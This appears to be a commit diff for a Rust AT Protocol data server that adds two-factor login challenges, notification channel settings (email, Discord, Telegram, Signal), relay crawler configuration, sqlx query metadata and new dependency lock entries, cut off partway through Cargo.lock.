+9 -8 .env.example
···
13
PDS_HOSTNAME=localhost:3000
14
PLC_URL=plc.directory
15
16
-
# A comma-separated list of WebSocket URLs for firehose relays to push updates to.
17
-
# e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com
18
-
RELAYS=
19
20
# Notification Service Configuration
21
# At least one notification channel should be configured for user notifications to work.
22
# Email notifications (via sendmail/msmtp)
23
# MAIL_FROM_ADDRESS=noreply@example.com
24
# MAIL_FROM_NAME=My PDS
25
# SENDMAIL_PATH=/usr/sbin/sendmail
26
27
-
# Discord notifications (not yet implemented)
28
-
# DISCORD_BOT_TOKEN=your-bot-token
29
30
-
# Telegram notifications (not yet implemented)
31
# TELEGRAM_BOT_TOKEN=your-bot-token
32
33
-
# Signal notifications (not yet implemented)
34
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
35
-
# SIGNAL_PHONE_NUMBER=+1234567890
36
37
CARGO_MOMMYS_LITTLE=mister
38
CARGO_MOMMYS_PRONOUNS=his
···
13
PDS_HOSTNAME=localhost:3000
14
PLC_URL=plc.directory
15
16
+
# A comma-separated list of relay URLs to notify via requestCrawl when we have updates.
17
+
# e.g., CRAWLERS=https://bsky.network
18
+
CRAWLERS=
19
20
# Notification Service Configuration
21
# At least one notification channel should be configured for user notifications to work.
22
+
23
# Email notifications (via sendmail/msmtp)
24
# MAIL_FROM_ADDRESS=noreply@example.com
25
# MAIL_FROM_NAME=My PDS
26
# SENDMAIL_PATH=/usr/sbin/sendmail
27
28
+
# Discord notifications (via webhook)
29
+
# DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/...
30
31
+
# Telegram notifications (via bot)
32
# TELEGRAM_BOT_TOKEN=your-bot-token
33
34
+
# Signal notifications (via signal-cli)
35
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
36
+
# SIGNAL_SENDER_NUMBER=+1234567890
37
38
CARGO_MOMMYS_LITTLE=mister
39
CARGO_MOMMYS_PRONOUNS=his
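For context, a minimal sketch (not code from this diff) of how a comma-separated `CRAWLERS` value like the one above might be split into individual relay URLs, skipping blanks:

```rust
use std::env;

// Hypothetical helper, shown only to illustrate the CRAWLERS format above.
fn crawler_urls() -> Vec<String> {
    env::var("CRAWLERS")
        .unwrap_or_default()
        .split(',')
        .map(str::trim)
        .filter(|s| !s.is_empty())
        .map(str::to_owned)
        .collect()
}
```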
+34 .sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "channel: NotificationChannel",
9
+
"type_info": {
10
+
"Custom": {
11
+
"name": "notification_channel",
12
+
"kind": {
13
+
"Enum": [
14
+
"email",
15
+
"discord",
16
+
"telegram",
17
+
"signal"
18
+
]
19
+
}
20
+
}
21
+
}
22
+
}
23
+
],
24
+
"parameters": {
25
+
"Left": [
26
+
"Text"
27
+
]
28
+
},
29
+
"nullable": [
30
+
false
31
+
]
32
+
},
33
+
"hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e"
34
+
}
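The query above decodes the custom `notification_channel` Postgres enum straight into a Rust type. A hedged sketch of what the Rust side might look like (the crate's actual definitions are not part of this diff); the `as "channel: NotificationChannel"` alias in the prepared statement is the sqlx macro syntax for that override, while the runtime API below infers the type from the function signature:

```rust
use sqlx::PgPool;

// Assumed Rust-side mapping for the `notification_channel` Postgres enum;
// the variant names match the enum values recorded in the query metadata above.
#[derive(Debug, Clone, Copy, sqlx::Type)]
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
pub enum NotificationChannel {
    Email,
    Discord,
    Telegram,
    Signal,
}

// Fetch a user's preferred channel; the column decodes via the derive above.
async fn preferred_channel(db: &PgPool, did: &str) -> Result<NotificationChannel, sqlx::Error> {
    sqlx::query_scalar("SELECT preferred_notification_channel FROM users WHERE did = $1")
        .bind(did)
        .fetch_one(db)
        .await
}
```

The same enum shows up again in the login and 2FA queries later in this diff.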
+61 .sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "request_uri",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "code",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "attempts",
29
+
"type_info": "Int4"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "created_at",
34
+
"type_info": "Timestamptz"
35
+
},
36
+
{
37
+
"ordinal": 6,
38
+
"name": "expires_at",
39
+
"type_info": "Timestamptz"
40
+
}
41
+
],
42
+
"parameters": {
43
+
"Left": [
44
+
"Text",
45
+
"Text",
46
+
"Text",
47
+
"Timestamptz"
48
+
]
49
+
},
50
+
"nullable": [
51
+
false,
52
+
false,
53
+
false,
54
+
false,
55
+
false,
56
+
false,
57
+
false
58
+
]
59
+
},
60
+
"hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f"
61
+
}
+22 .sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "two_factor_enabled",
9
+
"type_info": "Bool"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text"
15
+
]
16
+
},
17
+
"nullable": [
18
+
false
19
+
]
20
+
},
21
+
"hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09"
22
+
}
-30 .sqlx/query-243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Int8"
22
-
]
23
-
},
24
-
"nullable": [
25
-
false,
26
-
false
27
-
]
28
-
},
29
-
"hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1"
30
-
}
···
-30 .sqlx/query-2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Int8"
22
-
]
23
-
},
24
-
"nullable": [
25
-
false,
26
-
false
27
-
]
28
-
},
29
-
"hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c"
30
-
}
···
+2 -1 .sqlx/query-303777d97e6ed344f8c699eae37b7b0c241c734a5b7726019c2a59ae277caee6.json
-31 .sqlx/query-347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Text",
22
-
"Int8"
23
-
]
24
-
},
25
-
"nullable": [
26
-
false,
27
-
false
28
-
]
29
-
},
30
-
"hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e"
31
-
}
···
-31 .sqlx/query-4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Text",
22
-
"Int8"
23
-
]
24
-
},
25
-
"nullable": [
26
-
false,
27
-
false
28
-
]
29
-
},
30
-
"hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15"
31
-
}
···
+76 .sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "email",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "password_hash",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "two_factor_enabled",
29
+
"type_info": "Bool"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "preferred_notification_channel: NotificationChannel",
34
+
"type_info": {
35
+
"Custom": {
36
+
"name": "notification_channel",
37
+
"kind": {
38
+
"Enum": [
39
+
"email",
40
+
"discord",
41
+
"telegram",
42
+
"signal"
43
+
]
44
+
}
45
+
}
46
+
}
47
+
},
48
+
{
49
+
"ordinal": 6,
50
+
"name": "deactivated_at",
51
+
"type_info": "Timestamptz"
52
+
},
53
+
{
54
+
"ordinal": 7,
55
+
"name": "takedown_ref",
56
+
"type_info": "Text"
57
+
}
58
+
],
59
+
"parameters": {
60
+
"Left": [
61
+
"Text"
62
+
]
63
+
},
64
+
"nullable": [
65
+
false,
66
+
false,
67
+
false,
68
+
false,
69
+
false,
70
+
false,
71
+
true,
72
+
true
73
+
]
74
+
},
75
+
"hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810"
76
+
}
+22 .sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "attempts",
9
+
"type_info": "Int4"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Uuid"
15
+
]
16
+
},
17
+
"nullable": [
18
+
false
19
+
]
20
+
},
21
+
"hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6"
22
+
}
+2 -1 .sqlx/query-5d49bbf0307a0c642b0174d641de748fa648c97f8109255120e969c957ff95bf.json
+46 .sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "two_factor_enabled",
14
+
"type_info": "Bool"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "preferred_notification_channel: NotificationChannel",
19
+
"type_info": {
20
+
"Custom": {
21
+
"name": "notification_channel",
22
+
"kind": {
23
+
"Enum": [
24
+
"email",
25
+
"discord",
26
+
"telegram",
27
+
"signal"
28
+
]
29
+
}
30
+
}
31
+
}
32
+
}
33
+
],
34
+
"parameters": {
35
+
"Left": [
36
+
"Text"
37
+
]
38
+
},
39
+
"nullable": [
40
+
false,
41
+
false,
42
+
false
43
+
]
44
+
},
45
+
"hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f"
46
+
}
+14 .sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text"
9
+
]
10
+
},
11
+
"nullable": []
12
+
},
13
+
"hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4"
14
+
}
+14 .sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Uuid"
9
+
]
10
+
},
11
+
"nullable": []
12
+
},
13
+
"hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5"
14
+
}
+40 .sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "did",
9
+
"type_info": "Text"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "handle",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "email",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "last_used_at",
24
+
"type_info": "Timestamptz"
25
+
}
26
+
],
27
+
"parameters": {
28
+
"Left": [
29
+
"Text"
30
+
]
31
+
},
32
+
"nullable": [
33
+
false,
34
+
false,
35
+
false,
36
+
false
37
+
]
38
+
},
39
+
"hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb"
40
+
}
+58 .sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "request_uri",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "code",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "attempts",
29
+
"type_info": "Int4"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "created_at",
34
+
"type_info": "Timestamptz"
35
+
},
36
+
{
37
+
"ordinal": 6,
38
+
"name": "expires_at",
39
+
"type_info": "Timestamptz"
40
+
}
41
+
],
42
+
"parameters": {
43
+
"Left": [
44
+
"Text"
45
+
]
46
+
},
47
+
"nullable": [
48
+
false,
49
+
false,
50
+
false,
51
+
false,
52
+
false,
53
+
false,
54
+
false
55
+
]
56
+
},
57
+
"hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708"
58
+
}
-40 .sqlx/query-91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "did",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "password_hash",
14
-
"type_info": "Text"
15
-
},
16
-
{
17
-
"ordinal": 2,
18
-
"name": "deactivated_at",
19
-
"type_info": "Timestamptz"
20
-
},
21
-
{
22
-
"ordinal": 3,
23
-
"name": "takedown_ref",
24
-
"type_info": "Text"
25
-
}
26
-
],
27
-
"parameters": {
28
-
"Left": [
29
-
"Text"
30
-
]
31
-
},
32
-
"nullable": [
33
-
false,
34
-
false,
35
-
true,
36
-
true
37
-
]
38
-
},
39
-
"hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43"
40
-
}
···
+23 .sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "exists",
9
+
"type_info": "Int4"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text",
15
+
"Text"
16
+
]
17
+
},
18
+
"nullable": [
19
+
null
20
+
]
21
+
},
22
+
"hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b"
23
+
}
+12 .sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": []
8
+
},
9
+
"nullable": []
10
+
},
11
+
"hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac"
12
+
}
+2 -1 .sqlx/query-cb6f48aaba124c79308d20e66c23adb44d1196296b7f93fad19b2d17548ed3de.json
+206 -1 Cargo.lock
···
915
"dotenvy",
916
"ed25519-dalek",
917
"futures",
918
"hkdf",
919
"hmac",
920
"ipld-core",
921
"iroh-car",
922
"jacquard",
···
986
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
987
988
[[package]]
989
name = "byteorder"
990
version = "1.5.0"
991
source = "registry+https://github.com/rust-lang/crates.io-index"
992
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
993
994
[[package]]
995
name = "bytes"
···
1156
dependencies = [
1157
"cc",
1158
]
1159
1160
[[package]]
1161
name = "compression-codecs"
···
1820
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
1821
1822
[[package]]
1823
name = "ferroid"
1824
version = "0.8.7"
1825
source = "registry+https://github.com/rust-lang/crates.io-index"
···
1906
version = "0.1.5"
1907
source = "registry+https://github.com/rust-lang/crates.io-index"
1908
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
1909
1910
[[package]]
1911
name = "foreign-types"
···
2056
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
2057
2058
[[package]]
2059
name = "futures-util"
2060
version = "0.3.31"
2061
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2136
]
2137
2138
[[package]]
2139
name = "glob"
2140
version = "0.3.3"
2141
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2170
]
2171
2172
[[package]]
2173
name = "group"
2174
version = "0.12.1"
2175
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2260
dependencies = [
2261
"allocator-api2",
2262
"equivalent",
2263
-
"foldhash",
2264
]
2265
2266
[[package]]
···
2268
version = "0.16.1"
2269
source = "registry+https://github.com/rust-lang/crates.io-index"
2270
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
2271
2272
[[package]]
2273
name = "hashlink"
···
2760
]
2761
2762
[[package]]
2763
name = "indexmap"
2764
version = "1.9.3"
2765
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3477
]
3478
3479
[[package]]
3480
name = "multibase"
3481
version = "0.9.2"
3482
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3552
"memchr",
3553
"minimal-lexical",
3554
]
3555
3556
[[package]]
3557
name = "nu-ansi-term"
···
3976
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
3977
3978
[[package]]
3979
name = "polyval"
3980
version = "0.6.2"
3981
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4132
]
4133
4134
[[package]]
4135
name = "quinn"
4136
version = "0.11.9"
4137
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4265
version = "0.3.2"
4266
source = "registry+https://github.com/rust-lang/crates.io-index"
4267
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
4268
4269
[[package]]
4270
name = "redox_syscall"
···
5034
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
5035
5036
[[package]]
5037
name = "spki"
5038
version = "0.6.0"
5039
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6221
]
6222
6223
[[package]]
6224
name = "whoami"
6225
version = "1.6.1"
6226
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6831
"quote",
6832
"syn 2.0.111",
6833
]
···
915
"dotenvy",
916
"ed25519-dalek",
917
"futures",
918
+
"governor",
919
"hkdf",
920
"hmac",
921
+
"image",
922
"ipld-core",
923
"iroh-car",
924
"jacquard",
···
988
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
989
990
[[package]]
991
+
name = "bytemuck"
992
+
version = "1.24.0"
993
+
source = "registry+https://github.com/rust-lang/crates.io-index"
994
+
checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4"
995
+
996
+
[[package]]
997
name = "byteorder"
998
version = "1.5.0"
999
source = "registry+https://github.com/rust-lang/crates.io-index"
1000
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
1001
+
1002
+
[[package]]
1003
+
name = "byteorder-lite"
1004
+
version = "0.1.0"
1005
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1006
+
checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495"
1007
1008
[[package]]
1009
name = "bytes"
···
1170
dependencies = [
1171
"cc",
1172
]
1173
+
1174
+
[[package]]
1175
+
name = "color_quant"
1176
+
version = "1.1.0"
1177
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1178
+
checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b"
1179
1180
[[package]]
1181
name = "compression-codecs"
···
1840
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
1841
1842
[[package]]
1843
+
name = "fdeflate"
1844
+
version = "0.3.7"
1845
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1846
+
checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
1847
+
dependencies = [
1848
+
"simd-adler32",
1849
+
]
1850
+
1851
+
[[package]]
1852
name = "ferroid"
1853
version = "0.8.7"
1854
source = "registry+https://github.com/rust-lang/crates.io-index"
···
1935
version = "0.1.5"
1936
source = "registry+https://github.com/rust-lang/crates.io-index"
1937
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
1938
+
1939
+
[[package]]
1940
+
name = "foldhash"
1941
+
version = "0.2.0"
1942
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1943
+
checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
1944
1945
[[package]]
1946
name = "foreign-types"
···
2091
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
2092
2093
[[package]]
2094
+
name = "futures-timer"
2095
+
version = "3.0.3"
2096
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2097
+
checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
2098
+
2099
+
[[package]]
2100
name = "futures-util"
2101
version = "0.3.31"
2102
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2177
]
2178
2179
[[package]]
2180
+
name = "gif"
2181
+
version = "0.14.1"
2182
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2183
+
checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e"
2184
+
dependencies = [
2185
+
"color_quant",
2186
+
"weezl",
2187
+
]
2188
+
2189
+
[[package]]
2190
name = "glob"
2191
version = "0.3.3"
2192
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2221
]
2222
2223
[[package]]
2224
+
name = "governor"
2225
+
version = "0.10.2"
2226
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2227
+
checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79"
2228
+
dependencies = [
2229
+
"cfg-if",
2230
+
"dashmap 6.1.0",
2231
+
"futures-sink",
2232
+
"futures-timer",
2233
+
"futures-util",
2234
+
"getrandom 0.3.4",
2235
+
"hashbrown 0.16.1",
2236
+
"nonzero_ext",
2237
+
"parking_lot",
2238
+
"portable-atomic",
2239
+
"quanta",
2240
+
"rand 0.9.2",
2241
+
"smallvec",
2242
+
"spinning_top",
2243
+
"web-time",
2244
+
]
2245
+
2246
+
[[package]]
2247
name = "group"
2248
version = "0.12.1"
2249
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2334
dependencies = [
2335
"allocator-api2",
2336
"equivalent",
2337
+
"foldhash 0.1.5",
2338
]
2339
2340
[[package]]
···
2342
version = "0.16.1"
2343
source = "registry+https://github.com/rust-lang/crates.io-index"
2344
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
2345
+
dependencies = [
2346
+
"allocator-api2",
2347
+
"equivalent",
2348
+
"foldhash 0.2.0",
2349
+
]
2350
2351
[[package]]
2352
name = "hashlink"
···
2839
]
2840
2841
[[package]]
2842
+
name = "image"
2843
+
version = "0.25.9"
2844
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2845
+
checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a"
2846
+
dependencies = [
2847
+
"bytemuck",
2848
+
"byteorder-lite",
2849
+
"color_quant",
2850
+
"gif",
2851
+
"image-webp",
2852
+
"moxcms",
2853
+
"num-traits",
2854
+
"png",
2855
+
"zune-core",
2856
+
"zune-jpeg",
2857
+
]
2858
+
2859
+
[[package]]
2860
+
name = "image-webp"
2861
+
version = "0.2.4"
2862
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2863
+
checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3"
2864
+
dependencies = [
2865
+
"byteorder-lite",
2866
+
"quick-error",
2867
+
]
2868
+
2869
+
[[package]]
2870
name = "indexmap"
2871
version = "1.9.3"
2872
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3584
]
3585
3586
[[package]]
3587
+
name = "moxcms"
3588
+
version = "0.7.10"
3589
+
